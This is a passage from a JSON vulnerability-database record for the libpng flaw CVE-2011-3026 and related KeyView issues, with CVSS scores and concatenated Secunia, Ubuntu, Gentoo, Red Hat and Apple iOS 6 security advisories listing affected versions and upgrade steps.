"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.7,
"exploitability": "NOT DEFINED",
"exploitabilityScore": 10.0,
"id": "CVE-2012-6277",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "OFFICIAL FIX",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInteractionRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-59558",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-50971",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2011-3026",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2012-6277",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-59558",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-50971",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2011-3026",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#849841"
},
{
"db": "VULHUB",
"id": "VHN-59558"
},
{
"db": "VULHUB",
"id": "VHN-50971"
},
{
"db": "VULMON",
"id": "CVE-2011-3026"
},
{
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Integer overflow in libpng, as used in Google Chrome before 17.0.963.56, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an integer truncation. Autonomy Keyview IDOL contains multiple vulnerabilities in file parsers. These vulnerabilities could allow a remote attacker to execute arbitrary code on an affected system. libpng is prone to a remote integer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Failed exploit attempts will likely crash the library. Micro Focus Autonomy KeyView IDOL is a library from Micro Focus UK that can decode more than 1000 different file formats. A security vulnerability exists in Micro Focus Autonomy KeyView IDOL versions prior to 10.16. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSymantec Products KeyView File Processing Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA51365\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/51365/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51365\n\nRELEASE DATE:\n2012-11-21\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/51365/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/51365/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51365\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nSymantec has acknowledged some vulnerabilities in multiple products,\nwhich can be exploited by malicious people to compromise a vulnerable\nsystem. \n\nFor more information:\nSA51362\n\nThe vulnerabilities are reported in the following products:\n* Symantec Mail Security for Microsoft Exchange (SMSMSE) versions\n6.5.x\n* Symantec Mail Security for Domino (SMSDOM) versions 8.1.x\n* Symantec Messaging Gateway (SMG) versions 9.5.x\n* Symantec Data Loss Prevention(DLP) Enforce/Detection Servers for\nWindows versions 11.x\n* Symantec Data Loss Prevention Enforce/Detection Servers for Linux\nversions 11.x\n* Symantec Data Loss Prevention Endpoint Agents versions 11.x\n\nSOLUTION:\nUpdate of upgrade to a fixed version. \n\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nORIGINAL ADVISORY:\nSymantec:\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory\u0026pvid=security_advisory\u0026year=\u0026suid=20121120_00\n\nUS-CERT:\nhttp://www.kb.cert.org/vuls/id/849841\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. ============================================================================\nUbuntu Security Notice USN-1367-2\nFebruary 17, 2012\n\nfirefox vulnerability\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 11.10\n- Ubuntu 11.04\n- Ubuntu 10.10\n- Ubuntu 10.04 LTS\n\nSummary:\n\nFirefox could be made to crash or run programs as your login if it opened a\nspecially crafted file. \n\nOriginal advisory details:\n \n Jueri Aedla discovered that libpng did not properly verify the size used\n when allocating memory during chunk decompression. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201206-15\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: libpng: Multiple vulnerabilities\n Date: June 22, 2012\n Bugs: #373967, #386185, #401987, #404197, #410153\n ID: 201206-15\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities in libpng might allow remote attackers to\nexecute arbitrary code or cause a Denial of Service condition. It is used by several programs, including web\nbrowsers and potentially server processes. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 media-libs/libpng \u003c 1.5.10 \u003e= 1.5.10\n *\u003e= 1.2.49\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in libpng:\n\n* The \"embedded_profile_len()\" function in pngwutil.c does not check\n for negative values, resulting in a memory leak (CVE-2009-5063). \n* The \"png_format_buffer()\" function in pngerror.c contains an\n off-by-one error (CVE-2011-2501). \n* The \"png_rgb_to_gray()\" function in pngrtran.c contains an integer\n overflow error (CVE-2011-2690). \n* The \"png_err()\" function in pngerror.c contains a NULL pointer\n dereference error (CVE-2011-2691). \n* The \"png_handle_sCAL()\" function in pngrutil.c improperly handles\n malformed sCAL chunks(CVE-2011-2692). \n* The \"png_decompress_chunk()\" function in pngrutil.c contains an\n integer overflow error (CVE-2011-3026). \n* The \"png_inflate()\" function in pngrutil.c contains and out of bounds\n error (CVE-2011-3045). \n* The \"png_set_text_2()\" function in pngset.c contains an error which\n could result in memory corruption (CVE-2011-3048). \n* The \"png_formatted_warning()\" function in pngerror.c contains an\n off-by-one error (CVE-2011-3464). \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libpng 1.5 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=media-libs/libpng-1.5.10\"\n\nAll libpng 1.2 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=media-libs/libpng-1.2.49\"\n\nPackages which depend on this library may need to be recompiled. Tools\nsuch as revdep-rebuild may assist in identifying some of these\npackages. \n\nReferences\n==========\n\n[ 1 ] CVE-2009-5063\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-5063\n[ 2 ] CVE-2011-2501\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2501\n[ 3 ] CVE-2011-2690\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2690\n[ 4 ] CVE-2011-2691\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2691\n[ 5 ] CVE-2011-2692\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2692\n[ 6 ] CVE-2011-3026\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3026\n[ 7 ] CVE-2011-3045\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3045\n[ 8 ] CVE-2011-3048\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3048\n[ 9 ] CVE-2011-3464\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3464\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201206-15.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2012 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. Summary:\n\nUpdated seamonkey packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4. \n\nThe Red Hat Security Response Team has rated this update as having critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available from the CVE link in\nthe References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64\nRed Hat Enterprise Linux Desktop version 4 - i386, x86_64\nRed Hat Enterprise Linux ES version 4 - i386, ia64, x86_64\nRed Hat Enterprise Linux WS version 4 - i386, ia64, x86_64\n\n3. Description:\n\nSeaMonkey is an open source web browser, e-mail and newsgroup client, IRC\nchat client, and HTML editor. \n\nA heap-based buffer overflow flaw was found in the way SeaMonkey handled\nPNG (Portable Network Graphics) images. (CVE-2011-3026)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthis issue. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect. \n\n4. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/kb/docs/DOC-11259\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n790737 - CVE-2011-3026 libpng: Heap-buffer-overflow in png_decompress_chunk\n\n6. Package List:\n\nRed Hat Enterprise Linux AS version 4:\n\nSource:\nftp://updates.redhat.com/enterprise/4AS/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm\n\ni386:\nseamonkey-1.0.9-79.el4.i386.rpm\nseamonkey-chat-1.0.9-79.el4.i386.rpm\nseamonkey-debuginfo-1.0.9-79.el4.i386.rpm\nseamonkey-devel-1.0.9-79.el4.i386.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.i386.rpm\nseamonkey-js-debugger-1.0.9-79.el4.i386.rpm\nseamonkey-mail-1.0.9-79.el4.i386.rpm\n\nia64:\nseamonkey-1.0.9-79.el4.ia64.rpm\nseamonkey-chat-1.0.9-79.el4.ia64.rpm\nseamonkey-debuginfo-1.0.9-79.el4.ia64.rpm\nseamonkey-devel-1.0.9-79.el4.ia64.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.ia64.rpm\nseamonkey-js-debugger-1.0.9-79.el4.ia64.rpm\nseamonkey-mail-1.0.9-79.el4.ia64.rpm\n\nppc:\nseamonkey-1.0.9-79.el4.ppc.rpm\nseamonkey-chat-1.0.9-79.el4.ppc.rpm\nseamonkey-debuginfo-1.0.9-79.el4.ppc.rpm\nseamonkey-devel-1.0.9-79.el4.ppc.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.ppc.rpm\nseamonkey-js-debugger-1.0.9-79.el4.ppc.rpm\nseamonkey-mail-1.0.9-79.el4.ppc.rpm\n\ns390:\nseamonkey-1.0.9-79.el4.s390.rpm\nseamonkey-chat-1.0.9-79.el4.s390.rpm\nseamonkey-debuginfo-1.0.9-79.el4.s390.rpm\nseamonkey-devel-1.0.9-79.el4.s390.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.s390.rpm\nseamonkey-js-debugger-1.0.9-79.el4.s390.rpm\nseamonkey-mail-1.0.9-79.el4.s390.rpm\n\ns390x:\nseamonkey-1.0.9-79.el4.s390x.rpm\nseamonkey-chat-1.0.9-79.el4.s390x.rpm\nseamonkey-debuginfo-1.0.9-79.el4.s390x.rpm\nseamonkey-devel-1.0.9-79.el4.s390x.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.s390x.rpm\nseamonkey-js-debugger-1.0.9-79.el4.s390x.rpm\nseamonkey-mail-1.0.9-79.el4.s390x.rpm\n\nx86_64:\nseamonkey-1.0.9-79.el4.x86_64.rpm\nseamonkey-chat-1.0.9-79.el4.x86_64.rpm\nseamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm\nseamonkey-devel-1.0.9-79.el4.x86_64.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm\nseamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm\nseamonkey-mail-1.0.9-79.el4.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop version 4:\n\nSource:\nftp://updates.redhat.com/enterprise/4Desktop/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm\n\ni386:\nseamonkey-1.0.9-79.el4.i386.rpm\nseamonkey-chat-1.0.9-79.el4.i386.rpm\nseamonkey-debuginfo-1.0.9-79.el4.i386.rpm\nseamonkey-devel-1.0.9-79.el4.i386.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.i386.rpm\nseamonkey-js-debugger-1.0.9-79.el4.i386.rpm\nseamonkey-mail-1.0.9-79.el4.i386.rpm\n\nx86_64:\nseamonkey-1.0.9-79.el4.x86_64.rpm\nseamonkey-chat-1.0.9-79.el4.x86_64.rpm\nseamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm\nseamonkey-devel-1.0.9-79.el4.x86_64.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm\nseamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm\nseamonkey-mail-1.0.9-79.el4.x86_64.rpm\n\nRed Hat Enterprise Linux ES version 4:\n\nSource:\nftp://updates.redhat.com/enterprise/4ES/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm\n\ni386:\nseamonkey-1.0.9-79.el4.i386.rpm\nseamonkey-chat-1.0.9-79.el4.i386.rpm\nseamonkey-debuginfo-1.0.9-79.el4.i386.rpm\nseamonkey-devel-1.0.9-79.el4.i386.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.i386.rpm\nseamonkey-js-debugger-1.0.9-79.el4.i386.rpm\nseamonkey-mail-1.0.9-79.el4.i386.rpm\n\nia64:\nseamonkey-1.0.9-79.el4.ia64.rpm\nseamonkey-chat-1.0.9-79.el4.ia64.rpm\nseamonkey-debuginfo-1.0.9-79.el4.ia64.rpm\nseamonkey-devel-1.0.9-79.el4.ia64.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.ia64.rpm\nseamonkey-js-debugger-1.0.9-79.el4.ia64.rpm\nseamonkey-mail-1.0.9-79.el4.ia64.rpm\n\nx86_64:\nseamonkey-1.0.9-79.el4.x86_64.rpm\nseamonkey-chat-1.0.9-79.el4.x86_64.rpm\nseamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm\nseamonkey-devel-1.0.9-79.el4.x86_64.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm\nseamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm\nseamonkey-mail-1.0.9-79.el4.x86_64.rpm\n\nRed Hat Enterprise Linux WS version 4:\n\nSource:\nftp://updates.redhat.com/enterprise/4WS/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm\n\ni386:\nseamonkey-1.0.9-79.el4.i386.rpm\nseamonkey-chat-1.0.9-79.el4.i386.rpm\nseamonkey-debuginfo-1.0.9-79.el4.i386.rpm\nseamonkey-devel-1.0.9-79.el4.i386.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.i386.rpm\nseamonkey-js-debugger-1.0.9-79.el4.i386.rpm\nseamonkey-mail-1.0.9-79.el4.i386.rpm\n\nia64:\nseamonkey-1.0.9-79.el4.ia64.rpm\nseamonkey-chat-1.0.9-79.el4.ia64.rpm\nseamonkey-debuginfo-1.0.9-79.el4.ia64.rpm\nseamonkey-devel-1.0.9-79.el4.ia64.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.ia64.rpm\nseamonkey-js-debugger-1.0.9-79.el4.ia64.rpm\nseamonkey-mail-1.0.9-79.el4.ia64.rpm\n\nx86_64:\nseamonkey-1.0.9-79.el4.x86_64.rpm\nseamonkey-chat-1.0.9-79.el4.x86_64.rpm\nseamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm\nseamonkey-devel-1.0.9-79.el4.x86_64.rpm\nseamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm\nseamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm\nseamonkey-mail-1.0.9-79.el4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and \ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2011-3026.html\nhttps://access.redhat.com/security/updates/classification/#critical\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2012-09-19-1 iOS 6\n\niOS 6 is now available and addresses the following:\n\nCFNetwork\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to the\ndisclosure of sensitive information\nDescription: An issue existed in CFNetwork\u0027s handling of malformed\nURLs. CFNetwork may send requests to an incorrect hostname, resulting\nin the disclosure of sensitive information. This issue was addressed\nthrough improvements to URL handling. \nCVE-ID\nCVE-2012-3724 : Erling Ellingsen of Facebook\n\nCoreGraphics\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Multiple vulnerabilities in FreeType\nDescription: Multiple vulnerabilities existed in FreeType, the most\nserious of which may lead to arbitrary code execution when processing\na maliciously crafted font. These issues were addressed by updating\nFreeType to version 2.4.9. Further information is available via the\nFreeType site at http://www.freetype.org/\nCVE-ID\nCVE-2012-1126\nCVE-2012-1127\nCVE-2012-1128\nCVE-2012-1129\nCVE-2012-1130\nCVE-2012-1131\nCVE-2012-1132\nCVE-2012-1133\nCVE-2012-1134\nCVE-2012-1135\nCVE-2012-1136\nCVE-2012-1137\nCVE-2012-1138\nCVE-2012-1139\nCVE-2012-1140\nCVE-2012-1141\nCVE-2012-1142\nCVE-2012-1143\nCVE-2012-1144\n\nCoreMedia\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Viewing a maliciously crafted movie file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: An uninitialized memory access existed in the handling\nof Sorenson encoded movie files. This issue was addressed through\nimproved memory initialization. \nCVE-ID\nCVE-2012-3722 : Will Dormann of the CERT/CC\n\nDHCP\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A malicious Wi-Fi network may be able to determine networks\na device has previously accessed\nDescription: Upon connecting to a Wi-Fi network, iOS may broadcast\nMAC addresses of previously accessed networks per the DNAv4 protocol. \nThis issue was addressed by disabling DNAv4 on unencrypted Wi-Fi\nnetworks. \nCVE-ID\nCVE-2012-3725 : Mark Wuergler of Immunity, Inc. \n\nImageIO\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Viewing a maliciously crafted TIFF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A buffer overflow existed in libtiff\u0027s handling of\nThunderScan encoded TIFF images. This issue was addressed by updating\nlibtiff to version 3.9.5. \nCVE-ID\nCVE-2011-1167\n\nImageIO\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Viewing a maliciously crafted PNG image may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in libpng\u0027s\nhandling of PNG images. These issues were addressed through improved\nvalidation of PNG images. \nCVE-ID\nCVE-2011-3026 : Juri Aedla\nCVE-2011-3048\nCVE-2011-3328\n\nImageIO\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Viewing a maliciously crafted JPEG image may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A double free issue existed in ImageIO\u0027s handling of\nJPEG images. This issue was addressed through improved memory\nmanagement. \nCVE-ID\nCVE-2012-3726 : Phil of PKJE Consulting\n\nImageIO\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Viewing a maliciously crafted TIFF image may lead to an\nunexpected application termination or arbitrary code execution\nDescription: An integer overflow issue existed in libTIFF\u0027s handling\nof TIFF images. This issue was addressed through improved validation\nof TIFF images. \nCVE-ID\nCVE-2012-1173 : Alexander Gavrun working with HP\u0027s Zero Day\nInitiative\n\nInternational Components for Unicode\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Applications that use ICU may be vulnerable to an unexpected\napplication termination or arbitrary code execution\nDescription: A stack buffer overflow existed in the handling of ICU\nlocale IDs. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2011-4599\n\nIPSec\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Loading a maliciously crafted racoon configuration file may\nlead to arbitrary code execution\nDescription: A buffer overflow existed in the handling of racoon\nconfiguration files. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2012-3727 : iOS Jailbreak Dream Team\n\nKernel\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: An invalid pointer dereference issue existed in the\nkernel\u0027s handling of packet filter ioctls. This may allow an attacker\nto alter kernel memory. This issue was addressed through improved\nerror handling. \nCVE-ID\nCVE-2012-3728 : iOS Jailbreak Dream Team\n\nKernel\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An uninitialized memory access issue existed in the\nBerkeley Packet Filter interpreter, which led to the disclosure of\nmemory content. This issue was addressed through improved memory\ninitialization. \nCVE-ID\nCVE-2012-3729 : Dan Rosenberg\n\nlibxml\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Viewing a maliciously crafted web page may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple vulnerabilities existed in libxml, the most\nserious of which may lead to an unexpected application termination or\narbitrary code execution. These issues were addressed by applying the\nrelevant upstream patches. \nCVE-ID\nCVE-2011-1944 : Chris Evans of Google Chrome Security Team\nCVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of\nChinese Academy of Sciences\nCVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of\nChinese Academy of Sciences\nCVE-2011-3919 : Juri Aedla\n\nMail\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Mail may present the wrong attachment in a message\nDescription: A logic issue existed in Mail\u0027s handling of\nattachments. If a subsequent mail attachment used the same Content-ID\nas a previous one, the previous attachment would be displayed, even\nin the case where the 2 mails originated from different senders. This\ncould facilitate some spoofing or phishing attacks. This issue was\naddressed through improved handling of attachments. \nCVE-ID\nCVE-2012-3730 : Angelo Prado of the salesforce.com Product Security\nTeam\n\nMail\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Email attachments may be read without user\u0027s passcode\nDescription: A logic issue existed in Mail\u0027s use of Data Protection\non email attachments. This issue was addressed by properly setting\nthe Data Protection class for email attachments. \nCVE-ID\nCVE-2012-3731 : Stephen Prairie of Travelers Insurance, Erich\nStuntebeck of AirWatch\n\nMail\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: An attacker may spoof the sender of a S/MIME signed message\nDescription: S/MIME signed messages displayed the untrusted \u0027From\u0027\naddress, instead of the name associated with the message signer\u0027s\nidentity. This issue was addressed by displaying the address\nassociated with the message signer\u0027s identity when it is available. \nCVE-ID\nCVE-2012-3732 : An anonymous researcher\n\nMessages\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A user may unintentionally disclose the existence of their\nemail addresses\nDescription: When a user had multiple email addresses associated\nwith iMessage, replying to a message may have resulted in the reply\nbeing sent from a different email address. This may disclose another\nemail address associated to the user\u0027s account. This issue was\naddressed by always replying from the email address the original\nmessage was sent to. \nCVE-ID\nCVE-2012-3733 : Rodney S. Foley of Gnomesoft, LLC\n\nOffice Viewer\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Unencrypted document data may be written to a temporary file\nDescription: An information disclosure issue existed in the support\nfor viewing Microsoft Office files. When viewing a document, the\nOffice Viewer would write a temporary file containing data from the\nviewed document to the temporary directory of the invoking process. \nFor an application that uses data protection or other encryption to\nprotect the user\u0027s files, this could lead to information\ndisclosure. This issue was addressed by avoiding creation of\ntemporary files when viewing Office documents. \nCVE-ID\nCVE-2012-3734 : Salvatore Cataudella of Open Systems Technologies\n\nOpenGL\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: Applications that use OS X\u0027s OpenGL implementation may be\nvulnerable to an unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues existed in the\nhandling of GLSL compilation. These issues were addressed through\nimproved validation of GLSL shaders. \nCVE-ID\nCVE-2011-3457 : Chris Evans of the Google Chrome Security Team, and\nMarc Schoenefeld of the Red Hat Security Response Team\n\nPasscode Lock\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A person with physical access to the device could briefly\nview the last used third-party app on a locked device\nDescription: A logic issue existed with the display of the \"Slide to\nPower Off\" slider on the lock screen. This issue was addressed\nthrough improved lock state management. \nCVE-ID\nCVE-2012-3735 : Chris Lawrence DBB\n\nPasscode Lock\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A person with physical access to the device may be able to\nbypass the screen lock\nDescription: A logic issue existed in the termination of FaceTime\ncalls from the lock screen. This issue was addressed through improved\nlock state management. \nCVE-ID\nCVE-2012-3736 : Ian Vitek of 2Secure AB\n\nPasscode Lock\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: All photos may be accessible at the lock screen\nDescription: A design issue existed in the support for viewing\nphotos that were taken at the lock screen. In order to determine\nwhich photos to permit access to, the passcode lock consulted the\ntime at which the device was locked and compared it to the time that\na photo was taken. By spoofing the current time, an attacker could\ngain access to photos that were taken before the device was locked. \nThis issues was addressed by explicitly keeping track of the photos\nthat were taken while the device was locked. \nCVE-ID\nCVE-2012-3737 : Ade Barkah of BlueWax Inc. \n\nPasscode Lock\nAvailable for: iPhone 3GS and later,\niPod touch (4th generation) and later, iPad 2 and later\nImpact: A person with physical access to a locked device may perform\nFaceTime calls\nDescription: A logic issue existed in the Emergency Dialer screen,\nwhich permitted FaceTime calls via Voice Dialing on the locked\ndevice. This could also disclose the user\u0027s contacts via contact\nsuggestions. 